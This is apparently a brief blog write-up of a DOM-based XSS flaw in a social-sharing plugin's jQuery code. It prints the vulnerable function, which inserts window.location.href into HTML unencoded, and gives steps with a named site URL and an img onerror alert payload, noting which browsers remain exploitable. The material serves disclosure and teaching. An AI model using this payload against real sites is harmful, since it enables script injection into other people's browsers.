.Okay, let see an example of vulnerable code.){kind=link}
I just recently found exploitable DOM Based XSS vulnerability because of Vulnerable JavaScript dependency(Jquery).
Okay, let see an example of vulnerable code.
function sfsi_mobile_jake_share(url) {
if (jQuery('.sfsi_jake_follow_overlay')
.length == 0) {
jQuery('body')
.append("<div class='sfsi_jake_follow_overlay sfsi_overlay show'><div class='sfsi_inner_display'><a class='close_btn' href='' onclick=\"event.preventDefault();close_overlay(\'.sfsi_jake_follow_overlay\')\" >×</a><div style='width:95%; min-height:80%;background-color:#fff;margin:0 auto;margin:30% auto;padding: 20px 0;'><div style='width:90%;margin: 0 auto;'><input type='text' value='" + window.location.href + "' style='width:100%;padding:7px 0;text-align:center' /></div><div style='width:80%;margin:10px auto 0 auto'><div class='sfsi_upload_butt_container' ><button onclick='sfsi_copy_text_parent_input(event)' class='upload_butt' >Copy</button></div><div class='sfsi_upload_butt_container' ><a href='weixin://' class='upload_butt'>Open This Element</a></div></div></div></div>");
Okay, as you can see in this code replacing “window.location.href” object without encoding, So means it’s vulnerable to execute malicious code lines.
Let’s exploit it!
First, visit that vulnerable website URL that using javascript dependency like that as I mentioned above.
Example: http://cyberscap.com/
Then add #’><img src=x onerror=alert(document.domain)>
After that your vulnerable website URL should be like this: http://cyberscap.com/#’><img src=x onerror=alert(document.domain)>
But it will no longer work on web browsers like Chrome. Cause they have a default encode for “location.href” object. Anyhow it’s still exploitable on Edge. etc…